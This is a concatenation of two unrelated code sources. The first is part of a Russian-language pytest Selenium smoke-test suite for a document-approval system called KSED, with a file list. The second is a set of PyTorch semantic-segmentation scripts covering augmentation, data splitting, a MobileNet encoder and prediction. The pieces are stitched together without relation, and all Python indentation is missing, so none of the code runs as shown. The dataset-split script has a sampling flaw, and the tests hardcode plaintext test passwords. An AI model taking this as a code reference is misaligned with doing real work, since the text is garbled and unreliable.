getDoc = page2.getDoc()
take = page2.takeTask_RD()
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_701(web_browser):
""" ВЫПОЛНЕНИЕ ДЕЙСТВИЯ «ВЕРНУТЬ ЗАДАЧУ «СОГЛАСОВАТЬ ДОКУМЕНТ» """
# Шаг 1 создание документа
page = KSEDbackTask(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 2 создание маршрута
page = KSEDbackTask(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
getDoc = page.getDoc()
create_route = page.creation_of_the_approval_route()
# Шаг 3 вложение и направление на созгаласование
attach = page.attachment()
NapSoglasovanie = page.NapSoglasovanie()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 4 забрать задачу
page2 = KSEDbackTask(web_browser)
LogIn_page = page2.LogIN('tst_user1', 'Changeme!')
getDoc = page2.getDoc()
take = page2.takeTask_RD()
# Шаг 5 вернуть задачу
take = page2.backTask_RD()
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_702(web_browser):
""" ОТЗЫВ РЕШЕНИЯ """
# Шаг 1 создание документа
page = KSEDreturnDecision_RD(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 2 создание маршрута
page = KSEDreturnDecision_RD(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
getDoc = page.getDoc()
create_route = page.creation_of_the_approval_route()
# Шаг 3 вложение и направление на созгаласование
attach = page.attachment()
NapSoglasovanie = page.NapSoglasovanie()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 4 отклонение созгаласования
page2 = KSEDreturnDecision_RD(web_browser)
LogIn_page = page2.LogIN('YatskinRS', 'Changeme!')
getDoc = page2.getDoc()
reject = page2.rejectDoc()
# Шаг 4 отзыв решения
returnDecision = page2.returnDecision_RD()
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_703(web_browser):
""" СМЯГЧЕНИЕ РЕШЕНИЯ """
# Шаг 1 создание документа
page = KSEDsoftDecision_RD(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 2 создание маршрута
page = KSEDsoftDecision_RD(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
getDoc = page.getDoc()
create_route = page.creation_of_the_approval_route()
# Шаг 3 вложение и направление на созгаласование
attach = page.attachment()
NapSoglasovanie = page.NapSoglasovanie()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 4 отклонение созгаласования
page2 = KSEDsoftDecision_RD(web_browser)
LogIn_page = page2.LogIN('YatskinRS', 'Changeme!')
getDoc = page2.getDoc()
reject = page2.rejectDoc()
# Шаг 4 отзыв решения
returnDecision = page2.softDecision_RD()
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_704(web_browser):
""" ВНУТРЕННЕЕ СОГЛАСОВАНИЕ (Отклонение и последующий отзыв решения)"""
# Шаг 1 создание документа
page = KSEDchangeAfterRejectInnerSogl_RD(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
#Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 2 создание маршрута
#page = KSEDinnerSogl_RD(web_browser)
#LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
#getDoc = page.getDoc()
create_route = page.creation_of_the_approval_route()
# Шаг 3 вложение и направление на созгаласование
attach = page.attachment()
NapSoglasovanie = page.NapSoglasovanie()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 4 на правление на внутреннее согласование
page2 = KSEDchangeAfterRejectInnerSogl_RD(web_browser)
LogIn_page = page2.LogIN('YatskinRS', 'Changeme!')
getDoc = page2.getDoc()
innerSogl = page2.innerSogl()
Logout = page2.USER_LOGOUTs() # Выход из системы
# Шаг 5 Отклонение и отзыв решения на внутреннем согласовании
page3 = KSEDchangeAfterRejectInnerSogl_RD(web_browser)
LogIn_page = page3.LogIN('tst_user11', 'Changeme!')
getDoc = page3.getDoc()
innerSogl = page3.RejectInnerSogl()
innerSogl = page3.returnDecision_RD()
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_705(web_browser):
""" Внутреннее согласование - смягчение решения после отклонения"""
# Шаг 1 создание документа
page = KSEDsoftDesAfterRejectInnerSogl_RD(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
#Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 2 создание маршрута
#page = KSEDinnerSogl_RD(web_browser)
#LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
#getDoc = page.getDoc()
create_route = page.creation_of_the_approval_route()
# Шаг 3 вложение и направление на созгаласование
attach = page.attachment()
NapSoglasovanie = page.NapSoglasovanie()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 4 на правление на внутреннее согласование
page2 = KSEDsoftDesAfterRejectInnerSogl_RD(web_browser)
LogIn_page = page2.LogIN('YatskinRS', 'Changeme!')
getDoc = page2.getDoc()
innerSogl = page2.innerSogl()
Logout = page2.USER_LOGOUTs() # Выход из системы
# Шаг 5 Отклонение и отзыв решения на внутреннем согласовании
page3 = KSEDsoftDesAfterRejectInnerSogl_RD(web_browser)
LogIn_page = page3.LogIN('tst_user11', 'Changeme!')
getDoc = page3.getDoc()
innerSogl = page3.RejectInnerSogl()
innerSogl = page3.softDecision_RD()
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_706(web_browser):
""" Внутреннее согласование - отзыв решения после согласования"""
# Шаг 1 создание документа
page = KSEDchangeAfterAcceptInnerSogl_RD(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
#Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 2 создание маршрута
#page = KSEDinnerSogl_RD(web_browser)
#LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
#getDoc = page.getDoc()
create_route = page.creation_of_the_approval_route()
# Шаг 3 вложение и направление на созгаласование
attach = page.attachment()
NapSoglasovanie = page.NapSoglasovanie()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 4 на правление на внутреннее согласование
page2 = KSEDchangeAfterAcceptInnerSogl_RD(web_browser)
LogIn_page = page2.LogIN('YatskinRS', 'Changeme!')
getDoc = page2.getDoc()
innerSogl = page2.innerSogl()
Logout = page2.USER_LOGOUTs() # Выход из системы
# Шаг 5 Отклонение и отзыв решения на внутреннем согласовании
page3 = KSEDchangeAfterAcceptInnerSogl_RD(web_browser)
LogIn_page = page3.LogIN('tst_user11', 'Changeme!')
getDoc = page3.getDoc()
innerSogl = page3.AcceptInnerSogl()
innerSogl = page3.returnDecision_RD()
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_707(web_browser):
""" Внутреннее согласование - отзыв решения после согласования с замечаниями"""
# Шаг 1 создание документа
page = KSEDchangeAfterAcceptWithRemarkInnerSogl_RD(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
#Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 2 создание маршрута
#page = KSEDinnerSogl_RD(web_browser)
#LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
#getDoc = page.getDoc()
create_route = page.creation_of_the_approval_route()
# Шаг 3 вложение и направление на созгаласование
attach = page.attachment()
NapSoglasovanie = page.NapSoglasovanie()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 4 на правление на внутреннее согласование
page2 = KSEDchangeAfterAcceptWithRemarkInnerSogl_RD(web_browser)
LogIn_page = page2.LogIN('YatskinRS', 'Changeme!')
getDoc = page2.getDoc()
innerSogl = page2.innerSogl()
Logout = page2.USER_LOGOUTs() # Выход из системы
# Шаг 5 Отклонение и отзыв решения на внутреннем согласовании
page3 = KSEDchangeAfterAcceptWithRemarkInnerSogl_RD(web_browser)
LogIn_page = page3.LogIN('tst_user11', 'Changeme!')
getDoc = page3.getDoc()
innerSogl = page3.AcceptInnerSogl()
innerSogl = page3.returnDecision_RD()
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_708(web_browser):
""" Внутреннее согласование - смягчение решения после согласования с замечаниями"""
# Шаг 1 создание документа
page = KSEDsoftDisAfterAcceptWithRemarkInnerSogl_RD(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
#Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 2 создание маршрута
#page = KSEDinnerSogl_RD(web_browser)
#LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
#getDoc = page.getDoc()
create_route = page.creation_of_the_approval_route()
# Шаг 3 вложение и направление на созгаласование
attach = page.attachment()
NapSoglasovanie = page.NapSoglasovanie()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 4 на правление на внутреннее согласование
page2 = KSEDsoftDisAfterAcceptWithRemarkInnerSogl_RD(web_browser)
LogIn_page = page2.LogIN('YatskinRS', 'Changeme!')
getDoc = page2.getDoc()
innerSogl = page2.innerSogl()
Logout = page2.USER_LOGOUTs() # Выход из системы
# Шаг 5 Отклонение и отзыв решения на внутреннем согласовании
page3 = KSEDsoftDisAfterAcceptWithRemarkInnerSogl_RD(web_browser)
LogIn_page = page3.LogIN('tst_user11', 'Changeme!')
getDoc = page3.getDoc()
innerSogl = page3.AcceptInnerSogl()
innerSogl = page3.softDecision_RD()
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_709(web_browser):
""" Внутреннее согласование - добавление комментариев"""
# Шаг 1 создание документа
page = KSEDaddCommentInnerSogl_RD(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
#Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 2 создание маршрута
#page = KSEDinnerSogl_RD(web_browser)
#LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
#getDoc = page.getDoc()
create_route = page.creation_of_the_approval_route()
# Шаг 3 вложение и направление на созгаласование
attach = page.attachment()
NapSoglasovanie = page.NapSoglasovanie()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 4 на правление на внутреннее согласование
page2 = KSEDaddCommentInnerSogl_RD(web_browser)
LogIn_page = page2.LogIN('YatskinRS', 'Changeme!')
getDoc = page2.getDoc()
innerSogl = page2.innerSogl()
Logout = page2.USER_LOGOUTs() # Выход из системы
# Шаг 5 согласование на внутреннее согласование
page3 = KSEDaddCommentInnerSogl_RD(web_browser)
LogIn_page = page2.LogIN('tst_user11', 'Changeme!')
getDoc = page2.getDoc()
addComment = page2.addComment()
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_710(web_browser):
""" Внутреннее согласование после удаления добавленого комментария"""
# Шаг 1 создание документа
page = KSEDInnerSoglAfterAddComment_RD(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
#Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 2 создание маршрута
#page = KSEDinnerSogl_RD(web_browser)
#LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
#getDoc = page.getDoc()
create_route = page.creation_of_the_approval_route()
# Шаг 3 вложение и направление на созгаласование
attach = page.attachment()
NapSoglasovanie = page.NapSoglasovanie()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 4 на правление на внутреннее согласование
page2 = KSEDInnerSoglAfterAddComment_RD(web_browser)
LogIn_page = page2.LogIN('YatskinRS', 'Changeme!')
getDoc = page2.getDoc()
innerSogl = page2.innerSogl()
Logout = page2.USER_LOGOUTs() # Выход из системы
# Шаг 5 согласование на внутреннее согласование
page3 = KSEDInnerSoglAfterAddComment_RD(web_browser)
LogIn_page = page2.LogIN('tst_user11', 'Changeme!')
getDoc = page2.getDoc()
addComment = page2.addComment()
accept = page2.AcceptInnerSoglWithComment()
accept2 = page2.AcceptInnerSogl()
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_711(web_browser):
""" Основное согласование c комментариями """
# Шаг 1 создание документа
page = KSEDacceptSoglwithRemark_RD(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
# Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 2 создание маршрута
# page = KSEDacceptSoglwithRemark_RD(web_browser)
# LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
# getDoc = page.getDoc()
create_route = page.creation_of_the_approval_route()
# Шаг 3 вложение и направление на созгаласование
attach = page.attachment()
NapSoglasovanie = page.NapSoglasovanie()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 4 отклонение созгаласования
page2 = KSEDacceptSoglwithRemark_RD(web_browser)
LogIn_page = page2.LogIN('YatskinRS', 'Changeme!')
getDoc = page2.getDoc()
accept = page2.acceptDoc()
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_712(web_browser):
""" Основное согласование c комментариями и отзыв решения"""
# Шаг 1 создание документа
page = KSEDrejectAfterAcceptSoglwithRemark_RD(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
# Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 2 создание маршрута
# page = KSEDacceptSoglwithRemark_RD(web_browser)
# LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
# getDoc = page.getDoc()
create_route = page.creation_of_the_approval_route()
# Шаг 3 вложение и направление на созгаласование
attach = page.attachment()
NapSoglasovanie = page.NapSoglasovanie()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 4 отклонение созгаласования
page2 = KSEDrejectAfterAcceptSoglwithRemark_RD(web_browser)
LogIn_page = page2.LogIN('YatskinRS', 'Changeme!')
getDoc = page2.getDoc()
accept = page2.acceptDoc()
returnDis = page2.returnDecision_RD()
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_713(web_browser):
""" Основное согласование c комментариями и смягчение решения"""
# Шаг 1 создание документа
page = KSEDsoftDisAfterAcceptSoglwithRemark_RD(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
# Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 2 создание маршрута
# page = KSEDacceptSoglwithRemark_RD(web_browser)
# LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
# getDoc = page.getDoc()
create_route = page.creation_of_the_approval_route()
# Шаг 3 вложение и направление на созгаласование
attach = page.attachment()
NapSoglasovanie = page.NapSoglasovanie()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 4 отклонение созгаласования
page2 = KSEDsoftDisAfterAcceptSoglwithRemark_RD(web_browser)
LogIn_page = page2.LogIN('YatskinRS', 'Changeme!')
getDoc = page2.getDoc()
accept = page2.acceptDoc()
softDis = page2.softDecision_RD()
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_714(web_browser):
""" Отзыв решения делегата после отклонения согласования основного согласующего"""
# Шаг 1 создание документа
page = KSEDreturnDisFromDelegatAfterReject_RD(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
# Шаг 2 создание маршрута
create_route = page.creation_of_the_approval_route()
# Шаг 3 вложение и направление на созгаласование
attach = page.attachment()
NapSoglasovanie = page.NapSoglasovanie()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 4 отклонение созгаласования
page2 = KSEDreturnDisFromDelegatAfterReject_RD(web_browser)
LogIn_page = page2.LogIN('YatskinRS', 'Changeme!')
getDoc = page2.getDoc()
reject = page2.rejectDoc()
Logout = page.USER_LOGOUTs() # Выход из системы
page3 = KSEDreturnDisFromDelegatAfterReject_RD(web_browser)
LogIn_page = page3.LogIN('tst_user1', 'Changeme!')
getDoc = page2.getDoc()
returnDis = page3.returnDecision_RD()
@pytest.mark.KSED_smoke_test
#@pytest.fixture(scope="session")
def test_715(web_browser):
""" Отзыв решения после согласования делегата"""
# Шаг 1 создание документа
page = KSEDreturnDisAfterTakeTask(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 2 создание маршрута
page = KSEDreturnDisAfterTakeTask(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
getDoc = page.getDoc()
create_route = page.creation_of_the_approval_route()
# Шаг 3 вложение и направление на созгаласование
attach = page.attachment()
NapSoglasovanie = page.NapSoglasovanie()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 4 забрать задачу
page2 = KSEDreturnDisAfterTakeTask(web_browser)
LogIn_page = page2.LogIN('tst_user1', 'Changeme!')
getDoc = page2.getDoc()
take = page2.takeTask_RD()
reject = page2.rejectDoc()
Logout = page.USER_LOGOUTs() # Выход из системы
page3 = KSEDreturnDisAfterTakeTask(web_browser)
LogIn_page = page3.LogIN('YatskinRS', 'Changeme!')
getDoc = page2.getDoc()
returnDis = page3.returnDecision_RD()
@pytest.mark.KSED_smoke_test
# #@pytest.fixture(scope="session")
def test_716(web_browser):
""" Отзыв решения делегата после отклонения согласования основного согласующего"""
# Шаг 1 создание документа
page = KSEDsoftDisFromDelegatAfterReject_RD(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
# Шаг 2 создание маршрута
create_route = page.creation_of_the_approval_route()
# Шаг 3 вложение и направление на созгаласование
attach = page.attachment()
NapSoglasovanie = page.NapSoglasovanie()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 4 отклонение созгаласования
page2 = KSEDsoftDisFromDelegatAfterReject_RD(web_browser)
LogIn_page = page2.LogIN('YatskinRS', 'Changeme!')
getDoc = page2.getDoc()
reject = page2.rejectDoc()
Logout = page.USER_LOGOUTs() # Выход из системы
page3 = KSEDsoftDisFromDelegatAfterReject_RD(web_browser)
LogIn_page = page3.LogIN('tst_user1', 'Changeme!')
getDoc = page3.getDoc()
returnDis = page3.softDecision_RD()
@pytest.mark.KSED_smoke_test
# #@pytest.fixture(scope="session")
def test_717(web_browser):
""" Смягчение решения после отклонения делегата"""
# Шаг 1 создание документа
page = KSEDsoftDisAfterTakeTask(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
Creat_doc = page.Creat()
saveLink = page.LinkDocWFile()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 2 создание маршрута
page = KSEDsoftDisAfterTakeTask(web_browser)
LogIn_page = page.LogIN('StroganovSN', 'Changeme!')
getDoc = page.getDoc()
create_route = page.creation_of_the_approval_route()
# Шаг 3 вложение и направление на созгаласование
attach = page.attachment()
NapSoglasovanie = page.NapSoglasovanie()
Logout = page.USER_LOGOUTs() # Выход из системы
# Шаг 4 забрать задачу
page2 = KSEDsoftDisAfterTakeTask(web_browser)
LogIn_page = page2.LogIN('tst_user1', 'Changeme!')
getDoc = page2.getDoc()
take = page2.takeTask_RD()
reject = page2.rejectDoc()
Logout = page.USER_LOGOUTs() # Выход из системы
page3 = KSEDsoftDisAfterTakeTask(web_browser)
LogIn_page = page3.LogIN('YatskinRS', 'Changeme!')
getDoc = page3.getDoc()
returnDis = page3.softDecision_RD()
|
[
"/KSED/Pages/PageObject.py",
"/KSED/TestData/data.py",
"/KSED/TestData/locators.py",
"/KSED/TestData/pages.py",
"/KSED/Tests/tk11644.py",
"/KSED/Tests/tk11652.py",
"/KSED/Tests/tk11655.py",
"/KSED/Tests/tk11679.py",
"/KSED/Tests/tk11690.py",
"/KSED/Tests/tk11704.py",
"/KSED/Tests/tk11727.py",
"/KSED/Tests/tk11742.py",
"/KSED/Tests/tk11778.py",
"/KSED/Tests/tk11943.py",
"/KSED/Tests/tk11957.py",
"/KSED/Tests/tk12011.py",
"/KSED/Tests/tk12030.py",
"/KSED/Tests/tk12913.py",
"/KSED/Tests/tk12935.py",
"/KSED/Tests/tk12936.py",
"/KSED/Tests/tk13799.py",
"/KSED/Tests/tk13862.py",
"/KSED/Tests/tk15745.py",
"/KSED/Tests/tk15812.py",
"/KSED/Utils/decorator.py",
"/KSED/conftest.py",
"/KSED/test_Allure.py",
"/KSED/test_CardSoglas.py",
"/KSED/test_Interface.py",
"/KSED/test_Login.py",
"/KSED/test_PD.py",
"/KSED/test_PVK.py",
"/KSED/test_Poruchenie.py",
"/KSED/test_Profile.py",
"/KSED/test_Protocol.py",
"/KSED/test_RD.py",
"/KSED/test_Reestr.py",
"/KSED/test_Resolution.py",
"/KSED/test_SZ.py",
"/KSED/test_Zaprosi.py",
"/KSED/test_metods.py",
"/KSED/test_poshtuchno.py",
"/KSED/test_smoke.py"
] |
010404/SS-pytorch-mine
|
import os
import cv2
import argparse
import Augmentor
#文件路径
parser = argparse.ArgumentParser()
parser.add_argument('--Images', type=str, default='D:/untitled/.idea/SS_torch/Augmentor_img', help='true picture')
parser.add_argument('--final', type=str, default='D:/untitled/.idea/SS_torch/Augmentor_img/output', help='final picture')
parser.add_argument('--Masks', type=str, default='D:/untitled/.idea/SS_torch/Augmentor_mask', help='Mask picture')
parser.add_argument('--jpg_right', type=str, default='D:/untitled/.idea/SS_torch/dataset/jpg_right', help='final picture')
parser.add_argument('--png_right', type=str, default='D:/untitled/.idea/SS_torch/dataset/png_right', help='final masks')
parser.add_argument('--transtxt', type=str, default='D:/untitled/.idea/SS_torch/dataset/trans.txt', help='transtxt')
opt = parser.parse_args()
print(opt)
txt=opt.transtxt
paths = open("%s" % txt, "r")
data = []
for lines in paths:
path = lines.rstrip('\n')
data.append(path)
imgway_1=opt.Images
imgway_2=opt.final
JPG_RIGHT=opt.jpg_right
PNG_RIGHT=opt.png_right
#for循环命名需要
n1 = 1
n2 = 1
#进行数据增强
for index in range(len(data)):
#读取需要增强的image和label
image = cv2.imread("D:/untitled/.idea/SS_torch/dataset/jpg/%s" % data[index] + ".jpg", -1)
mask = cv2.imread("D:/untitled/.idea/SS_torch/dataset/png/%s" % data[index] + ".png", -1)
#保存至数据增强指定的文件夹中
cv2.imwrite("%s/%s.jpg" % (imgway_1, data[index]) ,image)
cv2.imwrite("%s/%s.jpg" % (opt.Masks, data[index]) , mask)
#数据增强主体
p = Augmentor.Pipeline(opt.Images) #读取image
p.ground_truth(opt.Masks) #读取label,使得label和对应的image进行相同变化的augmentor
p.rotate(probability=1, max_left_rotation=5, max_right_rotation=5) #旋转图片,左边最大旋转度,右边最大旋转度
p.shear(probability=1,max_shear_left=15,max_shear_right=15) #随机区域形变
p.flip_left_right(probability=0.5) #按概率左右翻转
p.zoom_random(probability=0.5, percentage_area=0.8) #按概率放大图片
p.flip_top_bottom(probability=0.5) #按概率上下翻转
p.sample(3) #产生3张图片
os.remove("%s/%s.jpg"%(imgway_1,data[index])) #去除原来的img,防止mask和img不匹配
os.remove("%s/%s.jpg" % (opt.Masks, data[index])) #去除原来的mask,防止mask和img不匹配
#将数据增强后的img和mask进行对应改名并移动到制定的文件夹中
for filename in os.listdir(r"%s" % imgway_2):
name = filename[:9]
if name =="Augmentor": #该图片是image
name_1 = [] # 把image的数字名称放入列表
name_1.append(filename[23:34]) #截取数字+格式
img = cv2.imread("%s" % imgway_2 + "/" + filename,-1)
name1_1 = name_1[0]
name2_1 = name1_1[:-6]+str(n1)+ name1_1[6:] #图片在原来名称基础上改名
cv2.imwrite("%s/%s" % (JPG_RIGHT, name2_1 )+".jpg", img)
n1+=1
if n1==4: #防止改名出现错误
n1=1
else: #该图片是mask
name_2 = [] # 把mask的数字名称放入列表
name_2.append(filename[31:42]) #截取数字+格式
img_2 = cv2.imread("%s" % imgway_2 + "/" + filename, -1)
name1_2 = name_2[0]
name2_2 = name1_2[:-6] + str(n2) + name1_2[6:] #图片在原来名称基础上改名
cv2.imwrite("%s/%s" % (PNG_RIGHT, name2_2)+".png", img_2)
n2 += 1
if n2==4: #防止改名出现错误
n2=1
--- FILE SEPARATOR ---
import os
import random
val_percent = 0.1
train_percent = 0.9
imagepath = 'dataset/jpg_right'
txtsavepath = 'dataset'
total_img = os.listdir(imagepath)
num = len(total_img)
list=range(num)
tv = int(num * val_percent) #验证个数
tr = int(num-tv) #训练个数
num_trainval = random.sample(list, tv) #随机获取tv个片段
num_train = random.sample(list, tr) #随机获取tr个片段
ftrain = open('dataset/train.txt', 'w')
fval = open('dataset/val.txt', 'w')
for i in range(num):
name = total_img[i][:-4] + '\n' #提取名字+转行
if i in num_train:
ftrain.write(name)
else:
fval.write(name)
print("True")
print(i+1)
ftrain.close()
fval.close()
--- FILE SEPARATOR ---
import torch
from torch.nn import *
from torch.nn.functional import relu6
#第一个卷积块
class Conv_block(Module):
def __init__(self,inplanes,outplanes,strides):
super(Conv_block, self).__init__()
self.zeropad=ZeroPad2d(padding=1)
self.conv=Conv2d(inplanes,outplanes,kernel_size=3,stride=strides,padding=0)
self.BN=BatchNorm2d(outplanes,momentum=0.1)
# self.relu=ReLU()
def forward(self,x):
x=self.zeropad(x)
x=self.conv(x)
x=self.BN(x)
# x=self.relu(x)
x=relu6(x)
return x
#除了第一个卷积块的后面的深度卷积块
class depthwise_block(Module):
def __init__(self,inplanes,outplanes,strides):
super(depthwise_block, self).__init__()
self.zeropad=ZeroPad2d(padding=1)
self.DW=Conv2d(inplanes,inplanes, #深度卷积,输入和输出通道一致
kernel_size=3,stride=strides,
padding=0,groups=inplanes, #groups=inplanes是实现深度卷积的重点
bias=False)
self.BN_1=BatchNorm2d(inplanes,momentum=0.1)
self.BN_2=BatchNorm2d(outplanes,momentum=0.1)
self.conv=Conv2d(inplanes,outplanes,kernel_size=1,stride=1)
# self.relu=ReLU()
def forward(self,x):
x=self.zeropad(x)
x=self.DW(x)
x=self.BN_1(x)
# x=self.relu(x)
x = relu6(x)
x=self.conv(x)
x=self.BN_2(x)
# x=self.relu(x)
x=relu6(x)
return x
class Mobilenet(Module):
cfg_filter=[32,64,128,128,256,256] #每个block的inplanes、outplanes
cfg_stride=[1,2,1,2,1] #每个block的strides
cfg_block=[] #初始化后的block集成一个列表
layer_data=[] #每个block处理后的output
def __init__(self):
super(Mobilenet, self).__init__()
self.conv_block=Conv_block(3,32,2) #第一个conv block
self.block_1=depthwise_block(32,64,1)
self.block_2=depthwise_block(64,128,2)
self.block_3=depthwise_block(128,128,1)
self.block_4=depthwise_block(128,256,2)
self.block_5=depthwise_block(256,256,1)
def forward(self,inputs):
x=inputs
x=self.conv_block(x)
x=self.block_1(x)
x=self.block_2(x)
x=self.block_3(x)
x=self.block_4(x)
x=self.block_5(x)
return x
#测试encoder网络
if __name__ =="__main__":
model=Mobilenet()
inputs=torch.randn(1,416,416,3).permute(0,3,1,2)
# inputs=torch.randn(1,3,416,416)
# layers_list=model(inputs)
outputs = model(inputs)
print("layers_3 shape:" )
# print(layers_list[2].shape)
print(outputs.shape)
--- FILE SEPARATOR ---
from segnet_ import Airplanesnet
from PIL import Image
import numpy as np
import torch
import argparse
import cv2
import copy
import os
parser = argparse.ArgumentParser()
parser.add_argument('--samples', type=str, default='D:/untitled/.idea/SS_torch/samples', help='samples')
parser.add_argument('--outputs', type=str, default='D:/untitled/.idea/SS_torch/outputs', help='outputs')
parser.add_argument('--weights', type=str, default='D:/untitled/.idea/SS_torch/weights/SS_weight_3.pth', help='weights')
opt = parser.parse_args()
print(opt)
colors = [[0,0,0],[255,0,0]]
NCLASSES = 2
BATCH_SIZE=1
img_way=opt.samples
img_save=opt.outputs
device=torch.device("cuda:0"if torch.cuda.is_available() else "cpu") #检测是否有GPU加速
model=Airplanesnet(NCLASSES,BATCH_SIZE) #初始化model
model.load_state_dict(torch.load(opt.weights)) #加载权重
model.to(device) #放入GPU
for jpg in os.listdir(r"%s" %img_way):
name = jpg[:-4]
with torch.no_grad():
image=cv2.imread("%s" % img_way + "/" + jpg)
old_image = copy.deepcopy(image)
old_image = np.array(old_image)
orininal_h = image.shape[0] #读取的图像的高
orininal_w = image.shape[1] #读取的图像的宽 方便之后还原大小
image = cv2.resize(image, dsize=(416, 416)) #调整大小
image = image / 255.0 #图像归一化
image = torch.from_numpy(image)
image = image.permute(2, 0, 1) #显式的调转维度
image = torch.unsqueeze(image, dim=0) #改变维度,使得符合model input size
image = image.type(torch.FloatTensor) #数据转换,否则报错
image = image.to(device) #放入GPU中计算
predict = model(image).cpu()
# print(predict.shape)
predict = torch.squeeze(predict) #[1,1,416,416]---->[1,416,416]
predict =predict.permute(1, 2, 0)
# print(jpg)
predict = predict.numpy()
# print(predict.shape)
pr=predict.argmax(axis=-1) #把class数量的层压缩为一层,Z轴上的值概率最高的返回该层index
seg_img = np.zeros((416, 416,3)) #创造三层0矩阵,方便进行涂色匹配
#进行染色
for c in range(NCLASSES):
seg_img[:, :, 0] += ((pr[:, :] == c) * (colors[c][0])).astype('uint8')
seg_img[:, :, 1] += ((pr[:, :] == c) * (colors[c][1])).astype('uint8')
seg_img[:, :, 2] += ((pr[:, :] == c) * (colors[c][2])).astype('uint8')
